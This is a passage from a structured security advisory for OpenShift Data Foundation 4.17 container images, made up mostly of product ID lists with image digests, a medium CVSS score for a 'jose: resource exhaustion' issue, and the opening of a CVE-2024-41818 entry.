"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5.3, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", version: "3.1", }, products: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "jose: resource exhaustion", }, { cve: "CVE-2024-41818", cwe: { id: "CWE-400", name: "Uncontrolled Resource Consumption", }, discovery_date: "2024-07-29T16:24:42+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", 